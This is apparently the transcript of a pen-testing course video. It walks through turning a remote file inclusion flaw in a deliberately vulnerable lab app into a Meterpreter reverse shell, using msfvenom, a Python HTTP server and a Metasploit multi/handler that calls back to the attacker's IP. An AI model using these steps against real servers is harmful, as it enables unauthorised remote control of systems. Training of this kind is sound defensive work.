Welcome to the Web Application Pen Testing course on Pentester Academy. Now in this video, we will look at how to go from a remote file inclusion vulnerability to getting Meterpreter on the box. Now why is getting Meterpreter so useful? Now pretty much when you have RFI and you're trying to run your code with your uploaded PHP files, the problem always is how do you get a ton of functionality and even interactive functionality with your shell. And this is where Meterpreter actually provides you a ton of features and at the very same time is decently standardized because it is part of Metasploit. So how do we get RFI to Meterpreter? Now, first of all, we are going to create a PHP Meterpreter version, and then we are going to execute this PHP Meterpreter using RFI. Now, of course, at this point we would require an exploit handler for the PHP Meterpreter running on the attacker's machine. So let's jump right to it. Now I am using the same RFI limited vulnerable application as in the previous video, and I have also put it below this video so that you can download it. So let's first create the PHP Meterpreter. So you're going to use msf venom -p PHP Meterpreter reverse TCP. Then we would need to give the lhost, which is the attacker's machine IP address. In this case is 2.22. The format would be raw, and the output we can store it in, let's say, meter.php. So let's wait for a second. Now let's open up meter.php, and Meterpreter, the PHP version, has a guard hash bit in the beginning. Let's remove that, save the file. Now let's set up the web server in here with simple HTTP server. Let's run it at port 8000. Go back to our previous example, if you recall, and let's now go ahead and fetch meter.php. Now before you run this or hit an enter, remember that we've forgotten to set up the exploit handler. So let's do that first. Use exploit multi-handler. Set the payload to be PHP Meterpreter reverse TCP. Set lhost to be 192.168.2.22, and let's wait for our shell to come in. Now let's hit an enter in here, and if we go back, there you have a Meterpreter session. Fantastic. Awesome, right? So this is how we can get from LFI to Meterpreter in 3 easy steps. So hopefully you enjoyed this video, and of course while setting this up, remember that for RFI to actually work, allow URL include needs to be enabled. That's all I had in mind for this video. If you're enjoying your time at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.